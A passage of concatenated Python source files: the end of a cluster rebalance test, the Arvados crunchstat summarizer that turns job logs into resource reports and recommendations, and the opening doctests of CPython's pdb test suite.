int(len(self.cluster.nodes_in_cluster)
- self.nodes_init))
rebalance_task = self.task.async_rebalance(
self.cluster.servers[:self.nodes_init], [], servs_out,
retry_get_process_num=3000)
self.task.jython_task_manager.get_task_result(
rebalance_task)
self.assertTrue(rebalance_task.result, "Rebalance Failed")
self.available_servers += servs_out
self.cluster.nodes_in_cluster = list(
set(self.cluster.nodes_in_cluster) - set(servs_out))
self.print_stats()
self.log.info("Volume Test Run Complete")
self.task_manager.abort_all_tasks()
|
summarizer.py
|
# Copyright (C) The Arvados Authors. All rights reserved.
#
# SPDX-License-Identifier: AGPL-3.0
import arvados
import collections
import crunchstat_summary.dygraphs
import crunchstat_summary.reader
import datetime
import functools
import itertools
import math
import re
import sys
import threading
import _strptime
from arvados.api import OrderedJsonModel
from crunchstat_summary import logger
# Recommend memory constraints that are this multiple of an integral
# number of GiB. (Actual nodes tend to be sold in sizes like 8 GiB
# that have amounts like 7.5 GiB according to the kernel.)
AVAILABLE_RAM_RATIO = 0.95
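# Illustrative note (not in the original source): with this ratio, a node
# advertised as "8 GiB" is assumed to expose roughly 8 * 0.95 = 7.6 GiB to
# jobs, so the RAM recommendations below round up to whole multiples of
# 0.95 GiB ("nearlygibs") rather than whole GiB.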
MB = 2**20
# Workaround datetime.datetime.strptime() thread-safety bug by calling
# it once before starting threads. https://bugs.python.org/issue7980
datetime.datetime.strptime('1999-12-31_23:59:59', '%Y-%m-%d_%H:%M:%S')
WEBCHART_CLASS = crunchstat_summary.dygraphs.DygraphsChart
class Task(object):
def __init__(self):
self.starttime = None
self.finishtime = None
self.series = collections.defaultdict(list)
class Summarizer(object):
def __init__(self, logdata, label=None, skip_child_jobs=False, uuid=None, **kwargs):
self._logdata = logdata
self.uuid = uuid
self.label = label
self.starttime = None
self.finishtime = None
self._skip_child_jobs = skip_child_jobs
# stats_max: {category: {stat: val}}
self.stats_max = collections.defaultdict(
functools.partial(collections.defaultdict, lambda: 0))
# task_stats: {task_id: {category: {stat: val}}}
self.task_stats = collections.defaultdict(
functools.partial(collections.defaultdict, dict))
self.seq_to_uuid = {}
self.tasks = collections.defaultdict(Task)
# We won't bother recommending new runtime constraints if the
# constraints given when running the job are known to us and
# are already suitable. If applicable, the subclass
# constructor will overwrite this with something useful.
self.existing_constraints = {}
logger.debug("%s: logdata %s", self.label, logdata)
def run(self):
logger.debug("%s: parsing logdata %s", self.label, self._logdata)
with self._logdata as logdata:
self._run(logdata)
def _run(self, logdata):
self.detected_crunch1 = False
for line in logdata:
if not self.detected_crunch1 and '-8i9sb-' in line:
self.detected_crunch1 = True
if self.detected_crunch1:
m = re.search(r'^\S+ \S+ \d+ (?P<seq>\d+) job_task (?P<task_uuid>\S+)$', line)
if m:
seq = int(m.group('seq'))
uuid = m.group('task_uuid')
self.seq_to_uuid[seq] = uuid
logger.debug('%s: seq %d is task %s', self.label, seq, uuid)
continue
m = re.search(r'^\S+ \S+ \d+ (?P<seq>\d+) (success in|failure \(#., permanent\) after) (?P<elapsed>\d+) seconds', line)
if m:
task_id = self.seq_to_uuid[int(m.group('seq'))]
elapsed = int(m.group('elapsed'))
self.task_stats[task_id]['time'] = {'elapsed': elapsed}
if elapsed > self.stats_max['time']['elapsed']:
self.stats_max['time']['elapsed'] = elapsed
continue
m = re.search(r'^\S+ \S+ \d+ (?P<seq>\d+) stderr Queued job (?P<uuid>\S+)$', line)
if m:
uuid = m.group('uuid')
if self._skip_child_jobs:
logger.warning('%s: omitting stats from child job %s'
' because --skip-child-jobs flag is on',
self.label, uuid)
continue
logger.debug('%s: follow %s', self.label, uuid)
child_summarizer = ProcessSummarizer(uuid)
child_summarizer.stats_max = self.stats_max
child_summarizer.task_stats = self.task_stats
child_summarizer.tasks = self.tasks
child_summarizer.starttime = self.starttime
child_summarizer.run()
logger.debug('%s: done %s', self.label, uuid)
continue
# 2017-12-02_17:15:08 e51c5-8i9sb-mfp68stkxnqdd6m 63676 0 stderr crunchstat: keepcalls 0 put 2576 get -- interval 10.0000 seconds 0 put 2576 get
m = re.search(r'^(?P<timestamp>[^\s.]+)(\.\d+)? (?P<job_uuid>\S+) \d+ (?P<seq>\d+) stderr (?P<crunchstat>crunchstat: )(?P<category>\S+) (?P<current>.*?)( -- interval (?P<interval>.*))?\n$', line)
if not m:
continue
else:
# crunch2
# 2017-12-01T16:56:24.723509200Z crunchstat: keepcalls 0 put 3 get -- interval 10.0000 seconds 0 put 3 get
m = re.search(r'^(?P<timestamp>\S+) (?P<crunchstat>crunchstat: )?(?P<category>\S+) (?P<current>.*?)( -- interval (?P<interval>.*))?\n$', line)
if not m:
continue
if self.label is None:
try:
self.label = m.group('job_uuid')
except IndexError:
self.label = 'label #1'
category = m.group('category')
if category.endswith(':'):
# "stderr crunchstat: notice: ..."
continue
elif category in ('error', 'caught'):
continue
elif category in ('read', 'open', 'cgroup', 'CID', 'Running'):
# "stderr crunchstat: read /proc/1234/net/dev: ..."
# (old logs are less careful with unprefixed error messages)
continue
if self.detected_crunch1:
task_id = self.seq_to_uuid[int(m.group('seq'))]
else:
task_id = 'container'
task = self.tasks[task_id]
# Use the first and last crunchstat timestamps as
# approximations of starttime and finishtime.
timestamp = m.group('timestamp')
if timestamp[10:11] == '_':
timestamp = datetime.datetime.strptime(
timestamp, '%Y-%m-%d_%H:%M:%S')
elif timestamp[10:11] == 'T':
timestamp = datetime.datetime.strptime(
timestamp[:19], '%Y-%m-%dT%H:%M:%S')
else:
raise ValueError("Cannot parse timestamp {!r}".format(
timestamp))
if task.starttime is None:
logger.debug('%s: task %s starttime %s',
self.label, task_id, timestamp)
if task.starttime is None or timestamp < task.starttime:
task.starttime = timestamp
if task.finishtime is None or timestamp > task.finishtime:
task.finishtime = timestamp
if self.starttime is None or timestamp < self.starttime:
self.starttime = timestamp
if self.finishtime is None or timestamp > self.finishtime:
self.finishtime = timestamp
if (not self.detected_crunch1) and task.starttime is not None and task.finishtime is not None:
elapsed = (task.finishtime - task.starttime).seconds
self.task_stats[task_id]['time'] = {'elapsed': elapsed}
if elapsed > self.stats_max['time']['elapsed']:
self.stats_max['time']['elapsed'] = elapsed
this_interval_s = None
for group in ['current', 'interval']:
if not m.group(group):
continue
category = m.group('category')
words = m.group(group).split(' ')
stats = {}
try:
for val, stat in zip(words[::2], words[1::2]):
if '.' in val:
stats[stat] = float(val)
else:
stats[stat] = int(val)
except ValueError as e:
# If the line doesn't start with 'crunchstat:' we
# might have mistaken an error message for a
# structured crunchstat line.
if m.group("crunchstat") is None or m.group("category") == "crunchstat":
logger.warning("%s: log contains message\n %s", self.label, line)
else:
logger.warning(
'%s: Error parsing value %r (stat %r, category %r): %r',
self.label, val, stat, category, e)
logger.warning('%s', line)
continue
if 'user' in stats or 'sys' in stats:
stats['user+sys'] = stats.get('user', 0) + stats.get('sys', 0)
if 'tx' in stats or 'rx' in stats:
stats['tx+rx'] = stats.get('tx', 0) + stats.get('rx', 0)
if group == 'interval':
if 'seconds' in stats:
this_interval_s = stats.get('seconds',0)
del stats['seconds']
if this_interval_s <= 0:
logger.error(
"BUG? interval stat given with duration {!r}".
format(this_interval_s))
else:
logger.error('BUG? interval stat missing duration')
for stat, val in stats.items():
if group == 'interval' and this_interval_s:
stat = stat + '__rate'
val = val / this_interval_s
if stat in ['user+sys__rate', 'user__rate', 'sys__rate', 'tx+rx__rate', 'rx__rate', 'tx__rate']:
task.series[category, stat].append(
(timestamp - self.starttime, val))
else:
if stat in ['rss','used','total']:
task.series[category, stat].append(
(timestamp - self.starttime, val))
self.task_stats[task_id][category][stat] = val
if val > self.stats_max[category][stat]:
self.stats_max[category][stat] = val
logger.debug('%s: done parsing', self.label)
self.job_tot = collections.defaultdict(
functools.partial(collections.defaultdict, int))
for task_id, task_stat in self.task_stats.items():
for category, stat_last in task_stat.items():
for stat, val in stat_last.items():
if stat in ['cpus', 'cache', 'swap', 'rss']:
# meaningless stats like 16 cpu cores x 5 tasks = 80
continue
self.job_tot[category][stat] += val
logger.debug('%s: done totals', self.label)
def long_label(self):
label = self.label
if hasattr(self, 'process') and self.process['uuid'] not in label:
label = '{} ({})'.format(label, self.process['uuid'])
if self.finishtime:
label += ' -- elapsed time '
s = (self.finishtime - self.starttime).total_seconds()
if s > 86400:
label += '{}d'.format(int(s/86400))
if s > 3600:
label += '{}h'.format(int(s/3600) % 24)
if s > 60:
label += '{}m'.format(int(s/60) % 60)
label += '{}s'.format(int(s) % 60)
return label
def text_report(self):
if not self.tasks:
return "(no report generated)\n"
return "\n".join(itertools.chain(
self._text_report_gen(),
self._recommend_gen())) + "\n"
def html_report(self):
return WEBCHART_CLASS(self.label, [self]).html()
def _text_report_gen(self):
yield "\t".join(['category', 'metric', 'task_max', 'task_max_rate', 'job_total'])
for category, stat_max in sorted(self.stats_max.items()):
for stat, val in sorted(stat_max.items()):
if stat.endswith('__rate'):
continue
max_rate = self._format(stat_max.get(stat+'__rate', '-'))
val = self._format(val)
tot = self._format(self.job_tot[category].get(stat, '-'))
yield "\t".join([category, stat, str(val), max_rate, tot])
for args in (
('Number of tasks: {}',
len(self.tasks),
None),
('Max CPU time spent by a single task: {}s',
self.stats_max['cpu']['user+sys'],
None),
('Max CPU usage in a single interval: {}%',
self.stats_max['cpu']['user+sys__rate'],
lambda x: x * 100),
('Overall CPU usage: {}%',
float(self.job_tot['cpu']['user+sys']) /
self.job_tot['time']['elapsed']
if self.job_tot['time']['elapsed'] > 0 else 0,
lambda x: x * 100),
('Max memory used by a single task: {}GB',
self.stats_max['mem']['rss'],
lambda x: x / 1e9),
('Max network traffic in a single task: {}GB',
self.stats_max['net:eth0']['tx+rx'] +
self.stats_max['net:keep0']['tx+rx'],
lambda x: x / 1e9),
('Max network speed in a single interval: {}MB/s',
self.stats_max['net:eth0']['tx+rx__rate'] +
self.stats_max['net:keep0']['tx+rx__rate'],
lambda x: x / 1e6),
('Keep cache miss rate {}%',
(float(self.job_tot['keepcache']['miss']) /
float(self.job_tot['keepcalls']['get']))
if self.job_tot['keepcalls']['get'] > 0 else 0,
lambda x: x * 100.0),
('Keep cache utilization {}%',
(float(self.job_tot['blkio:0:0']['read']) /
float(self.job_tot['net:keep0']['rx']))
if self.job_tot['net:keep0']['rx'] > 0 else 0,
lambda x: x * 100.0),
('Temp disk utilization {}%',
(float(self.job_tot['statfs']['used']) /
float(self.job_tot['statfs']['total']))
if self.job_tot['statfs']['total'] > 0 else 0,
lambda x: x * 100.0),
):
format_string, val, transform = args
if val == float('-Inf'):
continue
if transform:
val = transform(val)
yield "# "+format_string.format(self._format(val))
def _recommend_gen(self):
# TODO recommend fixing job granularity if elapsed time is too short
return itertools.chain(
self._recommend_cpu(),
self._recommend_ram(),
self._recommend_keep_cache(),
self._recommend_temp_disk(),
)
def _recommend_cpu(self):
"""Recommend asking for 4 cores if max CPU usage was 333%"""
constraint_key = self._map_runtime_constraint('vcpus')
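# Worked example (illustrative comment, not part of the original code):
# a peak rate of 3.33 (i.e. 333% CPU) gives used_cores = max(1, ceil(3.33)) = 4,
# so a job that asked for more than 4 vcpus gets a suggestion to lower it to 4.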
cpu_max_rate = self.stats_max['cpu']['user+sys__rate']
if cpu_max_rate == float('-Inf') or cpu_max_rate == 0.0:
logger.warning('%s: no CPU usage data', self.label)
return
# TODO Don't necessarily want to recommend on isolated max peak
# take average CPU usage into account as well or % time at max
used_cores = max(1, int(math.ceil(cpu_max_rate)))
asked_cores = self.existing_constraints.get(constraint_key)
if asked_cores is None:
asked_cores = 1
# TODO: This should be more nuanced in cases where max >> avg
if used_cores < asked_cores:
yield (
'#!! {} max CPU usage was {}% -- '
'try reducing runtime_constraints to "{}":{}'
).format(
self.label,
math.ceil(cpu_max_rate*100),
constraint_key,
int(used_cores))
# FIXME: This needs to be updated to account for current nodemanager algorithms
def _recommend_ram(self):
"""Recommend an economical RAM constraint for this job.
Nodes that are advertised as "8 gibibytes" actually have what
we might call "8 nearlygibs" of memory available for jobs.
Here, we calculate a whole number of nearlygibs that would
have sufficed to run the job, then recommend requesting a node
with that number of nearlygibs (expressed as mebibytes).
Requesting a node with "nearly 8 gibibytes" is our best hope
of getting a node that actually has nearly 8 gibibytes
available. If the node manager is smart enough to account for
the discrepancy itself when choosing/creating a node, we'll
get an 8 GiB node with nearly 8 GiB available. Otherwise, the
advertised size of the next-size-smaller node (say, 6 GiB)
will be too low to satisfy our request, so we will effectively
get rounded up to 8 GiB.
For example, if we need 7500 MiB, we can ask for 7500 MiB, and
we will generally get a node that is advertised as "8 GiB" and
has at least 7500 MiB available. However, asking for 8192 MiB
would either result in an unnecessarily expensive 12 GiB node
(if node manager knows about the discrepancy), or an 8 GiB
node which has less than 8192 MiB available and is therefore
considered by crunch-dispatch to be too small to meet our
constraint.
When node manager learns how to predict the available memory
for each node type such that crunch-dispatch always agrees
that a node is big enough to run the job it was brought up
for, all this will be unnecessary. We'll just ask for exactly
the memory we want -- even if that happens to be 8192 MiB.
"""
constraint_key = self._map_runtime_constraint('ram')
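# Worked example (illustrative comment, not part of the original code):
# a max RSS of 7500 MiB gives nearlygibs = 7500 / 0.95 / 1024 ~= 7.71,
# ceil -> 8, so the recommendation below is 8 * 0.95 * 1024 ~= 7782 MiB
# (converted to this summarizer's memory unit).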
used_bytes = self.stats_max['mem']['rss']
if used_bytes == float('-Inf'):
logger.warning('%s: no memory usage data', self.label)
return
used_mib = math.ceil(float(used_bytes) / MB)
asked_mib = self.existing_constraints.get(constraint_key)
nearlygibs = lambda mebibytes: mebibytes/AVAILABLE_RAM_RATIO/1024
if used_mib > 0 and (asked_mib is None or (
math.ceil(nearlygibs(used_mib)) < nearlygibs(asked_mib))):
yield (
'#!! {} max RSS was {} MiB -- '
'try reducing runtime_constraints to "{}":{}'
).format(
self.label,
int(used_mib),
constraint_key,
int(math.ceil(nearlygibs(used_mib))*AVAILABLE_RAM_RATIO*1024*(MB)/self._runtime_constraint_mem_unit()))
def _recommend_keep_cache(self):
"""Recommend increasing keep cache if utilization < 80%"""
constraint_key = self._map_runtime_constraint('keep_cache_ram')
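# Worked example (illustrative comment, not part of the original code):
# 6 GB of blkio reads against 10 GB received from Keep gives a utilization
# of 0.6 (60%), below the 0.8 threshold, so the advice is to double the
# existing keep cache constraint.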
if self.job_tot['net:keep0']['rx'] == 0:
return
utilization = (float(self.job_tot['blkio:0:0']['read']) /
float(self.job_tot['net:keep0']['rx']))
# FIXME: the default on this get won't work correctly
asked_cache = self.existing_constraints.get(constraint_key, 256) * self._runtime_constraint_mem_unit()
if utilization < 0.8:
yield (
'#!! {} Keep cache utilization was {:.2f}% -- '
'try doubling runtime_constraints to "{}":{} (or more)'
).format(
self.label,
utilization * 100.0,
constraint_key,
math.ceil(asked_cache * 2 / self._runtime_constraint_mem_unit()))
def _recommend_temp_disk(self):
"""Recommend decreasing temp disk if utilization < 50%"""
total = float(self.job_tot['statfs']['total'])
utilization = (float(self.job_tot['statfs']['used']) / total) if total > 0 else 0.0
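# Worked example (illustrative comment, not part of the original code):
# 20 GiB used out of 100 GiB total gives utilization 0.2 (20%), which is
# below the 50% threshold, so shrinking tmpdirMin/outdirMin is suggested.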
if utilization < 0.5 and total > 0:
yield (
'#!! {} max temp disk utilization was {:.0f}% of {:.0f} MiB -- '
'consider reducing "tmpdirMin" and/or "outdirMin"'
).format(
self.label,
utilization * 100.0,
total / MB)
def _format(self, val):
"""Return a string representation of a stat.
{:.2f} for floats, default format for everything else."""
if isinstance(val, float):
return '{:.2f}'.format(val)
else:
return '{}'.format(val)
def _runtime_constraint_mem_unit(self):
if hasattr(self, 'runtime_constraint_mem_unit'):
return self.runtime_constraint_mem_unit
elif self.detected_crunch1:
return JobSummarizer.runtime_constraint_mem_unit
else:
return ContainerRequestSummarizer.runtime_constraint_mem_unit
def _map_runtime_constraint(self, key):
if hasattr(self, 'map_runtime_constraint'):
return self.map_runtime_constraint[key]
elif self.detected_crunch1:
return JobSummarizer.map_runtime_constraint[key]
else:
return key
class CollectionSummarizer(Summarizer):
def __init__(self, collection_id, **kwargs):
super(CollectionSummarizer, self).__init__(
crunchstat_summary.reader.CollectionReader(collection_id), **kwargs)
self.label = collection_id
def NewSummarizer(process_or_uuid, **kwargs):
"""Construct with the appropriate subclass for this uuid/object."""
if isinstance(process_or_uuid, dict):
process = process_or_uuid
uuid = process['uuid']
else:
uuid = process_or_uuid
process = None
arv = arvados.api('v1', model=OrderedJsonModel())
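# Dispatch overview (illustrative comment, summarizing the branches below):
#   '-dz642-' container          -> ContainerRequestTreeSummarizer (via its CR)
#   '-xvhdp-' container request  -> ContainerRequestTreeSummarizer
#   '-8i9sb-' job                -> JobTreeSummarizer
#   '-d1hrv-' pipeline instance  -> PipelineSummarizer
#   '-4zz18-' collection         -> CollectionSummarizer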
if '-dz642-' in uuid:
if process is None:
# Get the associated CR. Doesn't matter which since they all have the same logs
crs = arv.container_requests().list(filters=[['container_uuid','=',uuid]],limit=1).execute()['items']
if len(crs) > 0:
process = crs[0]
klass = ContainerRequestTreeSummarizer
elif '-xvhdp-' in uuid:
if process is None:
process = arv.container_requests().get(uuid=uuid).execute()
klass = ContainerRequestTreeSummarizer
elif '-8i9sb-' in uuid:
if process is None:
process = arv.jobs().get(uuid=uuid).execute()
klass = JobTreeSummarizer
elif '-d1hrv-' in uuid:
if process is None:
process = arv.pipeline_instances().get(uuid=uuid).execute()
klass = PipelineSummarizer
elif '-4zz18-' in uuid:
return CollectionSummarizer(collection_id=uuid)
else:
raise ValueError("Unrecognized uuid %s" % uuid)
return klass(process, uuid=uuid, **kwargs)
class ProcessSummarizer(Summarizer):
"""Process is a job, pipeline, container, or container request."""
def __init__(self, process, label=None, **kwargs):
rdr = None
self.process = process
if label is None:
label = self.process.get('name', self.process['uuid'])
# Pre-Arvados v1.4 everything is in 'log'
# For 1.4+ containers have no logs and container_requests have them in 'log_uuid', not 'log'
log_collection = self.process.get('log')
if not log_collection:
log_collection = self.process.get('log_uuid')
if log_collection:
try:
rdr = crunchstat_summary.reader.CollectionReader(log_collection)
except arvados.errors.NotFoundError as e:
logger.warning("Trying event logs after failing to read "
"log collection %s: %s", self.process['log'], e)
if rdr is None:
rdr = crunchstat_summary.reader.LiveLogReader(self.process['uuid'])
label = label + ' (partial)'
super(ProcessSummarizer, self).__init__(rdr, label=label, **kwargs)
self.existing_constraints = self.process.get('runtime_constraints', {})
class JobSummarizer(ProcessSummarizer):
runtime_constraint_mem_unit = MB
map_runtime_constraint = {
'keep_cache_ram': 'keep_cache_mb_per_task',
'ram': 'min_ram_mb_per_node',
'vcpus': 'min_cores_per_node',
}
class ContainerRequestSummarizer(ProcessSummarizer):
runtime_constraint_mem_unit = 1
class MultiSummarizer(object):
def __init__(self, children={}, label=None, threads=1, **kwargs):
self.throttle = threading.Semaphore(threads)
self.children = children
self.label = label
def run_and_release(self, target, *args, **kwargs):
try:
return target(*args, **kwargs)
finally:
self.throttle.release()
def run(self):
threads = []
for child in self.children.values():
self.throttle.acquire()
t = threading.Thread(target=self.run_and_release, args=(child.run, ))
t.daemon = True
t.start()
threads.append(t)
for t in threads:
t.join()
def text_report(self):
txt = ''
d = self._descendants()
for child in d.values():
if len(d) > 1:
txt += '### Summary for {} ({})\n'.format(
child.label, child.process['uuid'])
txt += child.text_report()
txt += '\n'
return txt
def _descendants(self):
"""Dict of self and all descendants.
Nodes with nothing of their own to report (like
MultiSummarizers) are omitted.
"""
d = collections.OrderedDict()
for key, child in self.children.items():
if isinstance(child, Summarizer):
d[key] = child
if isinstance(child, MultiSummarizer):
d.update(child._descendants())
return d
def html_report(self):
return WEBCHART_CLASS(self.label, iter(self._descendants().values())).html()
class JobTreeSummarizer(MultiSummarizer):
"""Summarizes a job and all children listed in its components field."""
def __init__(self, job, label=None, **kwargs):
arv = arvados.api('v1', model=OrderedJsonModel())
label = label or job.get('name', job['uuid'])
children = collections.OrderedDict()
children[job['uuid']] = JobSummarizer(job, label=label, **kwargs)
if job.get('components', None):
preloaded = {}
for j in arv.jobs().index(
limit=len(job['components']),
filters=[['uuid','in',list(job['components'].values())]]).execute()['items']:
preloaded[j['uuid']] = j
for cname in sorted(job['components'].keys()):
child_uuid = job['components'][cname]
j = (preloaded.get(child_uuid) or
arv.jobs().get(uuid=child_uuid).execute())
children[child_uuid] = JobTreeSummarizer(job=j, label=cname, **kwargs)
super(JobTreeSummarizer, self).__init__(
children=children,
label=label,
**kwargs)
class PipelineSummarizer(MultiSummarizer):
def __init__(self, instance, **kwargs):
children = collections.OrderedDict()
for cname, component in instance['components'].items():
if 'job' not in component:
logger.warning(
"%s: skipping component with no job assigned", cname)
else:
logger.info(
"%s: job %s", cname, component['job']['uuid'])
summarizer = JobTreeSummarizer(component['job'], label=cname, **kwargs)
summarizer.label = '{} {}'.format(
cname, component['job']['uuid'])
children[cname] = summarizer
super(PipelineSummarizer, self).__init__(
children=children,
label=instance['uuid'],
**kwargs)
class ContainerRequestTreeSummarizer(MultiSummarizer):
def __init__(self, root, skip_child_jobs=False, **kwargs):
arv = arvados.api('v1', model=OrderedJsonModel())
label = kwargs.pop('label', None) or root.get('name') or root['uuid']
root['name'] = label
children = collections.OrderedDict()
todo = collections.deque((root, ))
while len(todo) > 0:
current = todo.popleft()
label = current['name']
sort_key = current['created_at']
summer = ContainerRequestSummarizer(current, label=label, **kwargs)
summer.sort_key = sort_key
children[current['uuid']] = summer
page_filters = []
while True:
child_crs = arv.container_requests().index(
order=['uuid asc'],
filters=page_filters+[
['requesting_container_uuid', '=', current['container_uuid']]],
).execute()
if not child_crs['items']:
break
elif skip_child_jobs:
logger.warning('%s: omitting stats from %d child containers'
' because --skip-child-jobs flag is on',
label, child_crs['items_available'])
break
page_filters = [['uuid', '>', child_crs['items'][-1]['uuid']]]
for cr in child_crs['items']:
if cr['container_uuid']:
logger.debug('%s: container req %s', current['uuid'], cr['uuid'])
cr['name'] = cr.get('name') or cr['uuid']
todo.append(cr)
sorted_children = collections.OrderedDict()
for uuid in sorted(list(children.keys()), key=lambda uuid: children[uuid].sort_key):
sorted_children[uuid] = children[uuid]
super(ContainerRequestTreeSummarizer, self).__init__(
children=sorted_children,
label=root['name'],
**kwargs)
|
test_pdb.py
|
# A test suite for pdb; not very comprehensive at the moment.
import doctest
import os
import pdb
import sys
import types
import codecs
import unittest
import subprocess
import textwrap
import linecache
from contextlib import ExitStack
from io import StringIO
from test.support import os_helper
# This little helper class is essential for testing pdb under doctest.
from test.test_doctest import _FakeInput
from unittest.mock import patch
class PdbTestInput(object):
"""Context manager that makes testing Pdb in doctests easier."""
def __init__(self, input):
self.input = input
def __enter__(self):
self.real_stdin = sys.stdin
sys.stdin = _FakeInput(self.input)
self.orig_trace = sys.gettrace() if hasattr(sys, 'gettrace') else None
def __exit__(self, *exc):
sys.stdin = self.real_stdin
if self.orig_trace:
sys.settrace(self.orig_trace)
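# Typical usage (illustrative comment; the doctests below are the canonical
# examples): wrap a call that hits pdb.set_trace() and feed it canned commands,
#   with PdbTestInput(['p x', 'continue']):
#       function_under_test()
# Each string is consumed as one (Pdb) command via the fake stdin.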
def test_pdb_displayhook():
"""This tests the custom displayhook for pdb.
>>> def test_function(foo, bar):
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... pass
>>> with PdbTestInput([
... 'foo',
... 'bar',
... 'for i in range(5): print(i)',
... 'continue',
... ]):
... test_function(1, None)
> <doctest test.test_pdb.test_pdb_displayhook[0]>(3)test_function()
-> pass
(Pdb) foo
1
(Pdb) bar
(Pdb) for i in range(5): print(i)
0
1
2
3
4
(Pdb) continue
"""
def test_pdb_basic_commands():
"""Test the basic commands of pdb.
>>> def test_function_2(foo, bar='default'):
... print(foo)
... for i in range(5):
... print(i)
... print(bar)
... for i in range(10):
... never_executed
... print('after for')
... print('...')
... return foo.upper()
>>> def test_function3(arg=None, *, kwonly=None):
... pass
>>> def test_function4(a, b, c, /):
... pass
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... ret = test_function_2('baz')
... test_function3(kwonly=True)
... test_function4(1, 2, 3)
... print(ret)
>>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... 'step', # entering the function call
... 'args', # display function args
... 'list', # list function source
... 'bt', # display backtrace
... 'up', # step up to test_function()
... 'down', # step down to test_function_2() again
... 'next', # stepping to print(foo)
... 'next', # stepping to the for loop
... 'step', # stepping into the for loop
... 'until', # continuing until out of the for loop
... 'next', # executing the print(bar)
... 'jump 8', # jump over second for loop
... 'return', # return out of function
... 'retval', # display return value
... 'next', # step to test_function3()
... 'step', # stepping into test_function3()
... 'args', # display function args
... 'return', # return out of function
... 'next', # step to test_function4()
... 'step', # stepping to test_function4()
... 'args', # display function args
... 'continue',
... ]):
... test_function()
> <doctest test.test_pdb.test_pdb_basic_commands[3]>(3)test_function()
-> ret = test_function_2('baz')
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(1)test_function_2()
-> def test_function_2(foo, bar='default'):
(Pdb) args
foo = 'baz'
bar = 'default'
(Pdb) list
1 -> def test_function_2(foo, bar='default'):
2 print(foo)
3 for i in range(5):
4 print(i)
5 print(bar)
6 for i in range(10):
7 never_executed
8 print('after for')
9 print('...')
10 return foo.upper()
[EOF]
(Pdb) bt
...
<doctest test.test_pdb.test_pdb_basic_commands[4]>(25)<module>()
-> test_function()
<doctest test.test_pdb.test_pdb_basic_commands[3]>(3)test_function()
-> ret = test_function_2('baz')
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(1)test_function_2()
-> def test_function_2(foo, bar='default'):
(Pdb) up
> <doctest test.test_pdb.test_pdb_basic_commands[3]>(3)test_function()
-> ret = test_function_2('baz')
(Pdb) down
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(1)test_function_2()
-> def test_function_2(foo, bar='default'):
(Pdb) next
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(2)test_function_2()
-> print(foo)
(Pdb) next
baz
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(3)test_function_2()
-> for i in range(5):
(Pdb) step
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(4)test_function_2()
-> print(i)
(Pdb) until
0
1
2
3
4
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(5)test_function_2()
-> print(bar)
(Pdb) next
default
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(6)test_function_2()
-> for i in range(10):
(Pdb) jump 8
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(8)test_function_2()
-> print('after for')
(Pdb) return
after for
...
--Return--
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(10)test_function_2()->'BAZ'
-> return foo.upper()
(Pdb) retval
'BAZ'
(Pdb) next
> <doctest test.test_pdb.test_pdb_basic_commands[3]>(4)test_function()
-> test_function3(kwonly=True)
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_basic_commands[1]>(1)test_function3()
-> def test_function3(arg=None, *, kwonly=None):
(Pdb) args
arg = None
kwonly = True
(Pdb) return
--Return--
> <doctest test.test_pdb.test_pdb_basic_commands[1]>(2)test_function3()->None
-> pass
(Pdb) next
> <doctest test.test_pdb.test_pdb_basic_commands[3]>(5)test_function()
-> test_function4(1, 2, 3)
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_basic_commands[2]>(1)test_function4()
-> def test_function4(a, b, c, /):
(Pdb) args
a = 1
b = 2
c = 3
(Pdb) continue
BAZ
"""
def reset_Breakpoint():
import bdb
bdb.Breakpoint.clearBreakpoints()
def test_pdb_breakpoint_commands():
"""Test basic commands related to breakpoints.
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... print(1)
... print(2)
... print(3)
... print(4)
First, need to clear bdb state that might be left over from previous tests.
Otherwise, the new breakpoints might get assigned different numbers.
>>> reset_Breakpoint()
Now test the breakpoint commands. NORMALIZE_WHITESPACE is needed because
the breakpoint list outputs a tab for the "stop only" and "ignore next"
lines, which we don't want to put in here.
>>> with PdbTestInput([ # doctest: +NORMALIZE_WHITESPACE
... 'break 3',
... 'disable 1',
... 'ignore 1 10',
... 'condition 1 1 < 2',
... 'break 4',
... 'break 4',
... 'break',
... 'clear 3',
... 'break',
... 'condition 1',
... 'enable 1',
... 'clear 1',
... 'commands 2',
... 'p "42"',
... 'print("42", 7*6)', # Issue 18764 (not about breakpoints)
... 'end',
... 'continue', # will stop at breakpoint 2 (line 4)
... 'clear', # clear all!
... 'y',
... 'tbreak 5',
... 'continue', # will stop at temporary breakpoint
... 'break', # make sure breakpoint is gone
... 'continue',
... ]):
... test_function()
> <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>(3)test_function()
-> print(1)
(Pdb) break 3
Breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
(Pdb) disable 1
Disabled breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
(Pdb) ignore 1 10
Will ignore next 10 crossings of breakpoint 1.
(Pdb) condition 1 1 < 2
New condition set for breakpoint 1.
(Pdb) break 4
Breakpoint 2 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) break 4
Breakpoint 3 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) break
Num Type Disp Enb Where
1 breakpoint keep no at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
stop only if 1 < 2
ignore next 10 hits
2 breakpoint keep yes at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
3 breakpoint keep yes at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) clear 3
Deleted breakpoint 3 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) break
Num Type Disp Enb Where
